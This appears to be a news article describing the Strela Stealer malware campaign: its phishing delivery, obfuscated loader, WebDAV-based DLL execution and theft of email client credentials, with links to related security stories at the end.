The cybersecurity landscape has been impacted by the emergence of the Strela Stealer malware, a sophisticated infostealer designed to target specific geographic regions in Europe.
This malware has been active since late 2022 and is known for its precision in targeting Microsoft Outlook and Mozilla Thunderbird email clients.
Strela Stealer has been distributed through large-scale phishing campaigns, primarily affecting users in Spain, Italy, Germany, and Ukraine.
Phishing Campaigns and Delivery Mechanism
The threat actor behind Strela Stealer, identified as Hive0145, has evolved their tactics by using social engineering techniques to deceive victims.
Recent campaigns involve sending legitimate-looking emails with invoices, but instead of the actual invoice, a ZIP archive containing the malware loader is attached.
Once opened, the ZIP file executes a JScript script via Windows Script Host, which is heavily obfuscated to evade detection.
The script checks the system’s locale to ensure it matches targeted regions before proceeding with the malware deployment.
Technical Analysis and Obfuscation Techniques
Strela Stealer employs advanced obfuscation techniques, including multi-layer obfuscation and control-flow flattening, making its analysis challenging.
The malware connects to a public WebDAV file share to download and execute a DLL file using regsvr32, without saving it to disk.
According to Trustwave Report, this DLL is packed with unnecessary arithmetic operations and lacks imports, complicating its static analysis.
The final stage of the malware involves XOR decryption of the payload and reconstruction of the import address table. It also uses fibers and fiber local storage to hinder debugging efforts.
Once activated, Strela Stealer searches for email client data, specifically targeting Mozilla Thunderbird and Microsoft Outlook profiles.
It encrypts and exfiltrates login credentials to a command-and-control (C2) server hosted on a Russian bulletproof network.
The malware also gathers system information and lists installed applications, sending this data to the C2 server.
The use of a unique user-agent based on the system’s volume GUID helps in identifying compromised hosts.
The C2 infrastructure is linked to the Proton66 OOO autonomous system, known for its involvement in various malware campaigns.
The sophistication and targeted nature of Strela Stealer highlight the evolving threats in the cybersecurity landscape, emphasizing the need for robust security measures to protect against such targeted attacks.
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Warning for WordPress Admins – Fake SEO Plugins Hijacking Websites")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Apache APISIX Flaw Enables Unauthorized Cross-Issuer Access Due to Misconfigurations")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Instagram Adopts Daily TLS Certificate Rotation with One-Week Validity")
